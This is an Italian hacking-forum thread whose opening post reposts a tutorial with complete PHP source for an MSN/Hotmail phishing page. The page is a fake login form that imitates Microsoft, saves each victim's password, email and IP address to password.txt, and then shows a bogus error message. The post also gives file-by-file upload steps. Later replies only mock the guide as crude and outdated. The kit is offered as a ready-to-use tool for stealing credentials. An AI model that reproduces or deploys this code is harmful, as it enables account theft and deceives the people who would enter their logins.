Guida al Fake-Login

« Older   Newer »
  Share  
.:.Ref_MD5.:.
view post Posted on 9/2/2009, 17:51




MSN Password Grabber Whit Fake-Login
**********************************************************
Autore: KinG-LioN
MSN: [email protected]
Info: [email protected]
web: http://www.eurohackers.it/
Origine: http://kinglionweb.altervista.org/tutorial/msn.txt
**********************************************************

Componenti fake-login:

Index.php
Config.php
colori.php
hotmail77x19.gif
msn.gif
Stile.inc
colori.txt
password.txt

#Perch? questo progetto?
Ho deciso di creare questo Password Grabber, che potete riadattare a qualsiasi stile, cambiando le immagine, la parte HTML dell'index.php ed il colore da colori.txt, perche fino ad oggi TUTTI i password Grabber che ho visto in rete, si basano sui cgi-bin, permettendoci di ricevere una E-mail coi dati inseriti dalla Vittima, ad un indirizzo da noi scelto.
Questo sistema, oltre ad essere obsoleto e anche inutile nel 90% dei casi.
Primo perche al giorno d'oggi ? molto difficile riuscire a trovare un servizo gratuito che ci offre la gestione dei cgi-bin.
In secondo luogo, la vittima per inviarci i suoi dati deve inviare una "E-mail muta", quindi risulta indispensabile l'utilizzo da parte di quest'ultima di un client di posta elettronica quale ad esempio Outlook o Incredimail.
In Fine, anche nel caso in cui riuscissimo a trovare un fornitore di cgi-bin gratuito, e la nostra vittima usasse client di posta elettronica, al momento in cui senderebbe i dati, il suo client lo avviserebbe che un messaggio muto sta per essere inviato, chiedendo la conferma dell'invio alla vittima.

#Come nasce questa idea?
Un Giorno vidi in internet un fake-login che si basava su cgi-bin e decisi di provarlo, accorgendomi subito degli errori sopra descritti.
Quindi mi chiesi... Ma ci sar? un modo per non usare la gestione di e-mail per ricevere i dati?
A quesl punto pensai ai numerevoli GuestBook php che non facevano uso di database sql, i quali una volta scritto un messaggio, cliccando sull'apposito pulsante invia, stampava a video i campi immessi dall'utente su una pagina php.
Cosi Ho deciso di creare questo Fake-login basandomi su un GuestBook in php da me creato qualche mese prima.
Naturalmente Gli utenti non verranno mai rediretti sulla pagina nella quale vengono stampati i dati che dovr? rimanere segreta per tutti, tranne che per l'admin, ma verranno rediretti su una pagina di errore personalizzabile.

------------------------------------------[INIZIO FAKE-LOGIN]-----------------------------------------

Iniziare col creare un file da chiamere password.txt all'interno del quale verranno stampate automaticamente le password che riuscirete a racimolare, ed uplodarlo nella folder in cui sono presenti i vari file dello script.
Scaricare le immagini hotmail77x19.gif e msn.gif dai seguenti link's
http://kinglionweb.altervista.org/hotmail77x19.gif
http://kinglionweb.altervista.org/msn.gif ed uplodarle nella folder in cui avrete sharato i vari file.


-------------------------------------------------[index.php]------------------------------------------------------------


<?php
//Script Powered by KinG-LioN - [email protected] - http://www.eurohackers.it
include "colori.php" ;
include "config.php" ;

if(isset($_POST['submit'])){

$email = Strip_Tags($_POST['email']);
$pwd = Strip_Tags($_POST['nick']);
$ip = $_POST['ip'];
$data = date('j/n/y - H:i') ;



$dati_file = "password.txt";

// |

$riga_messaggio = "$pwd|$email|$data|$ip";
$riga_messaggio = str_replace("\n","
",$riga_messaggio);
$riga_messaggio = stripslashes($riga_messaggio);
$riga_messaggio .= "\n";

$fp = fopen($dati_file, "a");
if(!$fp) {
echo "Errore! Non si puo aprire il file delle password";
exit;
}

$fw = fwrite($fp, $riga_messaggio);
$fc = fclose($fp);


echo "Errore di sistema. Riprovare pi? tardi.
";


}

?>

<html>
<head>
<title>MSN Phishing by KinG-LioN</title>

<?php include "stile.inc" ;?>

<body>












Servizio di Gestione password fornito da MSN



<form name="formkinglion" method="post" action="<?php echo $_SERVER['PHP_SELF']; ?> ">



<input name="ip" type="hidden" value="<?php echo $_SERVER['REMOTE_ADDR']; ?>">
Nome Utente: <input type="text" name="email" value="[email protected]" size=25>
Password: <input type="password" name="nick" size=25>



<input type="submit" name="submit" value="Accedi" id="bottoni">

</form>





<?php
echo "<div id='copy'> ? 2006 Microsoft Corporation. Tutti i diritti riservati.";
?>
</body>
</html>

-------------------------------------[Fine index.php]------------------------------------------------

Copiare il tutto su NotePad, salvarlo con estensione .php ed uplodare il file.

-------------------------------------------------[colori.php]------------------------------------------------------------

<?php
//Script Powered by KinG-LioN - [email protected] - http://www.eurohackers.it
$datafile = "colori.txt";
if (file_exists($datafile)) {

$apro=fopen($datafile,"r");
$leggo=fread($apro,filesize($datafile));
fclose($apro);
$array_dati=explode("|",$leggo);


$bgcolor= $array_dati[0];
$fontcolor = $array_dati[1];

}


?>

--------------------------------------------[Fine colori.php]----------------------------------------

Copiare il tutto su NotePad, salvarlo con estensione .php ed uplodare il file.


-----------------------------------------------[config.php]---------------------------------------
<?php
// Imposta la tua password e se desideri ricevere una mail quando vengono inseriti i messaggi
//Script Powered by KinG-LioN - [email protected] - http://www.eurohackers.it
$pass= "";
$sendmail= 0; //imposta a 1 se vuoi ricevere la mail
$tuaemail = "[email protected]";

?>

-------------------------------------------[Fine config.php]----------------------------------------


Copiare il tutto su NotePad, salvarlo con estensione .php ed uplodare il file.


----------------------------------------------[colori.txt]-----------------------------------------


#006699|white|4


----------------------------------------------[Fine colori.txt]--------------------------------------

Copiare il tutto su NotePad, salvarlo con estensione .txt ed uplodare il file.



-------------------------------------------------[Stile.inc]------------------------------------------


<?php

echo " <style type='text/css'>";
echo "BODY, TD {";
echo " font-family : Verdana, Arial, sans-serif ;";
echo " font-size : 9pt;";
echo " color:$fontcolor;";
echo " background: $bgcolor ;";
echo "}";



echo " A {FONT-WEIGHT: bold; COLOR:$fontcolor; TEXT-DECORATION: underline}";

echo " A:hover{FONT-WEIGHT: bold;COLOR: #e5e5e5; TEXT-DECORATION: none}";



echo "H2 {";
echo " font-size:18px;";
echo "}";



echo "H3 {";
echo " font-size: 15pt;";
echo " font-style: italic;";
echo " font-family: sans-serif;";
echo "}";


echo "H4 {";
echo " font-family: sans-serif;";
echo " font-size: 10pt;";
echo "}";

echo "HR {";
echo " background-color :$fontcolor;";
echo " border : dotted;";
echo "}";
echo "#bottoni {";
echo " background: $bgcolor ;";
echo " border-left: 2px solid $fontcolor;";
echo " border-right:2px solid Black;";
echo " border-top-color : 2px solid $fontcolor;";
echo " border-bottom-color : 2px solid Black;";
echo " color:$fontcolor;";
echo " padding : 2px;";
echo " font-weight : bold;";

echo "}";
echo "#copy {
font-size : xx-small;
text-align :center;
}";

echo "</style>";
?>


-------------------------------------------------[Fine Stile.inc]-------------------------------------

Copiare il tutto su NotePad, salvarlo con estensione .inc ed uplodare il file.


------------------------------------------------[FINE FAKE-LOGIN]-------------------------------------

#eurohackers.it
 
Top
Bonus
view post Posted on 10/2/2009, 19:19




Attenzione alla sezione Hacking...
Non so come la prende il Moderatore di questa sezione.. :)
 
Top
vlk4r0
view post Posted on 11/2/2009, 19:48




CITAZIONE (Bonus @ 10/2/2009, 19:19)
Attenzione alla sezione Hacking...
Non so come la prende il Moderatore di questa sezione.. :)

Oggi è stata una bella giornata. Quindi mi limito a domandare.
O grande .:.Ref_MD5.:., tu che illumini il nostro cammino, potresti per favore spiegare ai visitatori che ignorano
DOVE CARICO I FILES?
E COME FUNZIONA IL TUTTO?
Per essere una guida manca di questi elementi essenziali.

Dalle nozioni (minime di fronte alle tue, o grande genio) che ho io mi sembra l'ennesima cavolata.

Regards,
vlk4r0

P.S.: vorrei sapere qual'è il coglione che cade in un tranello così mal fatto, retrodatato al 2006.

Edit.:comunque questo non è hacking "puro"...
 
Top
view post Posted on 29/6/2009, 11:33

Advanced Member

Group:
Member
Posts:
1,647
Location:
Int0 Th3 SySt3m

Status:


e perchè king lion è un hacker??? XD può fare solo lamerate...
 
Top
3 replies since 9/2/2009, 17:51   4342 views
  Share